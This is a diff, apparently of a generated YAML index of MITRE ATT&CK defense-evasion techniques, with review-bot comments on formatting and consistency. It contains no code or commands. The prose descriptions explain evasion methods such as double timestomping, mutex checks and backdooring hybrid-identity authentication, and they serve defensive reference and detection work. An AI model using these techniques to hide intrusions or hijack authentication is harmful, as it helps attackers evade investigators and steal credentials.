- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests: []
T1620:
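Review bot: the `Double Timestomping` reference description ends with a doubled period (`Stay sharp out there..`), and quoting the tweet text verbatim as the title reads oddly beside the other entries; trim to a single period or use a short descriptive title. More substantively, the new description introduces the `$STANDARD_INFORMATION`/`$FILE_NAME` distinction and notes that existing detections rely on discrepancies between `$SI` and `$FN`, and the `Magnet Forensics` reference added here is specifically about the NTFS timestamp-mismatch artifact, yet the unchanged `x_mitre_detection` text still mentions only generic file-handle monitoring and timestamp comparison. A sentence tying the `$SI`/`$FN` mismatch to the newly listed `File: File Metadata` source, and the user-level API calls the description says are used to set `$SI` to the newly added `Process: OS API Execution` source, would make the detection field match the description it now sits under.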
@@ -4134,9 +4219,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
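Review bot: the new T1480.002 object ends with `atomic_tests: []` but has no `identifier: T1480.002` line before it, unlike T1620 directly above and T1070.006 earlier in the patch, which both carry `identifier: <id>` in that position; add it so consumers that key on `identifier` see this technique. Two smaller points in the same block: `x_mitre_detection: ''` is an empty string where every other technique in this patch carries text (worth confirming that mirrors the upstream object rather than a generator default), and the third contributor entry uses an en dash (`Nagahama Hiroki – NEC Corporation Japan`) where the two entries above it use a comma.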
@@ -4200,57 +4352,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
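Review bot: the `Deloitte Environment Awareness` URL changes from `.../1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc` to `.../1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit` together with a new retrieved date of September 13, 2024; an `/edit` suffix on a Drive link may not resolve for unauthenticated readers, so please confirm it loads without sign-in or keep the plain file URL. Everything else in this hunk re-emits the fields deleted in the earlier T1497.003 hunk (`revoked: false`, the reference list in a new order, `type`, `id`, `created`, `created_by_ref`) in the new key order, so apart from that URL the content is unchanged.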
@@ -4338,8 +4490,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests: []
T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
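Review bot: `spec_version: '2.1'` is dropped from T1553.003 at the top of this hunk, and the same key disappears from every other technique touched in this diff while `x_mitre_attack_spec_version` is kept; anything downstream that filters or validates on the STIX `spec_version` will now find nothing, so either confirm the index generator deliberately stopped emitting it or restore it. The Azure AD to Entra ID rename in the description is applied consistently across the three rewritten passages; note that `Entra ID(Citation: Azure AD Hybrid Identity)` keeps the citation key and the missing space from the old `AD(Citation:` text, which is upstream wording and should not be hand-patched here.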
@@ -4905,9 +5049,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
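Review bot: replacing `Azure AD`, `Google Workspace` and `Office 365` with `Office Suite` and `Identity Provider` in `x_mitre_platforms` changes which per-platform indexes T1556.007 is listed under, so the matching platform index files must be regenerated in the same change or they drift out of sync with this YAML; the identical platform swap recurs below for T1078.001, T1548 and T1548.005. The version bump from `1.0` to `1.1` lines up with that platform change, and the `x_mitre_attack_spec_version: 3.2.0` added here pairs with the removal of the old `2.1.0` value a few hunks later, so the block is internally consistent.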
@@ -4970,9 +5115,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
